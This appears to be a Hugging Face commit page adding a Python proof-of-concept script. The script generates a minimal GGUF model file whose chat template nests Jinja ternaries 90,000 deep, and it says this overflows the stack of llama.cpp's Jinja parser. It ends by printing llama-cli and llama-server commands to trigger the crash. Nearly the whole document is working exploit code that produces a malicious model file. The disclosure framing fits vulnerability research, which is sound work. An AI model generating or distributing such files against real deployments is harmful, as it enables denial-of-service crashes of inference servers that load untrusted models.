salvepilo commited on
Commit
2bcc7c3
·
verified ·
1 Parent(s): ddf730e

Add PoC generator script

Browse files
Files changed (1) hide show
  1. craft_full_gguf_poc.py +120 -0
craft_full_gguf_poc.py ADDED
@@ -0,0 +1,120 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Stack Overflow in llama.cpp Jinja Parser via Malicious GGUF Chat Template
4
+
5
+ Creates a minimal but valid GGUF model file with a deeply nested Jinja chat
6
+ template that causes a stack overflow (SIGSEGV) when parsed by llama.cpp.
7
+
8
+ Vulnerability: Unbounded recursion in parse_if_expression()
9
+ File: common/jinja/parser.cpp, line 336
10
+ """
11
+
12
+ import numpy as np
13
+ from gguf import GGUFWriter
14
+ import os
15
+
16
+ def generate_malicious_template(depth=90000):
17
+ """Generate deeply nested ternary Jinja expression"""
18
+ parts = ["{{ "]
19
+ for i in range(depth):
20
+ parts.append(f"x{i%10} if c{i%10} else ")
21
+ parts.append("'end' }}")
22
+ return "".join(parts)
23
+
24
+ def create_minimal_llama_gguf(output_path, chat_template, arch="llama"):
25
+ """Create a minimal valid GGUF file with llama architecture metadata"""
26
+
27
+ writer = GGUFWriter(output_path, arch)
28
+
29
+ # Minimal llama hyperparameters (required to pass model loading)
30
+ n_embd = 32 # tiny embedding
31
+ n_head = 4 # 4 attention heads
32
+ n_head_kv = 4 # same for KV
33
+ n_layer = 1 # single layer
34
+ n_ff = 64 # tiny feed-forward
35
+ n_vocab = 32 # tiny vocabulary
36
+ ctx_len = 128 # minimal context
37
+
38
+ writer.add_context_length(ctx_len)
39
+ writer.add_embedding_length(n_embd)
40
+ writer.add_block_count(n_layer)
41
+ writer.add_head_count(n_head)
42
+ writer.add_head_count_kv(n_head_kv)
43
+ writer.add_feed_forward_length(n_ff)
44
+ writer.add_vocab_size(n_vocab)
45
+ writer.add_layer_norm_rms_eps(1e-5)
46
+ writer.add_rope_dimension_count(n_embd // n_head)
47
+
48
+ # Tokenizer metadata
49
+ writer.add_tokenizer_model("llama")
50
+ writer.add_token_list([f"tok_{i}".encode() for i in range(n_vocab)])
51
+ writer.add_token_scores([0.0] * n_vocab)
52
+ writer.add_token_types([0] * n_vocab)
53
+ writer.add_bos_token_id(0)
54
+ writer.add_eos_token_id(1)
55
+
56
+ # THE MALICIOUS CHAT TEMPLATE
57
+ writer.add_chat_template(chat_template)
58
+
59
+ # Minimal tensors (required for model loading)
60
+ # Token embeddings
61
+ writer.add_tensor("token_embd.weight",
62
+ np.zeros((n_vocab, n_embd), dtype=np.float16))
63
+
64
+ # Output norm
65
+ writer.add_tensor("output_norm.weight",
66
+ np.ones(n_embd, dtype=np.float32))
67
+
68
+ # Output projection
69
+ writer.add_tensor("output.weight",
70
+ np.zeros((n_vocab, n_embd), dtype=np.float16))
71
+
72
+ # Single transformer layer
73
+ writer.add_tensor("blk.0.attn_norm.weight",
74
+ np.ones(n_embd, dtype=np.float32))
75
+ writer.add_tensor("blk.0.attn_q.weight",
76
+ np.zeros((n_embd, n_embd), dtype=np.float16))
77
+ writer.add_tensor("blk.0.attn_k.weight",
78
+ np.zeros((n_head_kv * (n_embd // n_head), n_embd), dtype=np.float16))
79
+ writer.add_tensor("blk.0.attn_v.weight",
80
+ np.zeros((n_head_kv * (n_embd // n_head), n_embd), dtype=np.float16))
81
+ writer.add_tensor("blk.0.attn_output.weight",
82
+ np.zeros((n_embd, n_embd), dtype=np.float16))
83
+ writer.add_tensor("blk.0.ffn_norm.weight",
84
+ np.ones(n_embd, dtype=np.float32))
85
+ writer.add_tensor("blk.0.ffn_gate.weight",
86
+ np.zeros((n_ff, n_embd), dtype=np.float16))
87
+ writer.add_tensor("blk.0.ffn_up.weight",
88
+ np.zeros((n_ff, n_embd), dtype=np.float16))
89
+ writer.add_tensor("blk.0.ffn_down.weight",
90
+ np.zeros((n_embd, n_ff), dtype=np.float16))
91
+
92
+ writer.write_header_to_file()
93
+ writer.write_kv_data_to_file()
94
+ writer.write_tensors_to_file()
95
+ writer.close()
96
+
97
+ file_size = os.path.getsize(output_path)
98
+ print(f"[+] Created: {output_path}")
99
+ print(f"[+] Size: {file_size} bytes ({file_size/1024:.1f} KB)")
100
+
101
+ if __name__ == "__main__":
102
+ output_dir = "/Users/eltarne/Documents/script/gguf_poc"
103
+ os.makedirs(output_dir, exist_ok=True)
104
+
105
+ # Crash threshold is ~87150 on macOS 8MB stack
106
+ # Use 90000 to ensure crash on all platforms
107
+ depth = 90000
108
+
109
+ print(f"[*] Generating malicious chat template (depth={depth})...")
110
+ template = generate_malicious_template(depth)
111
+ print(f"[*] Template size: {len(template)} bytes")
112
+
113
+ output_path = os.path.join(output_dir, "poc_crash_model.gguf")
114
+ print(f"[*] Creating malicious GGUF model...")
115
+ create_minimal_llama_gguf(output_path, template)
116
+
117
+ print(f"\n[+] To reproduce the crash:")
118
+ print(f"[+] llama-cli -m {output_path} --jinja -p 'hello'")
119
+ print(f"[+] llama-server -m {output_path} --jinja")
120
+ print(f"[+] Expected: Segmentation fault (stack overflow in Jinja parser)")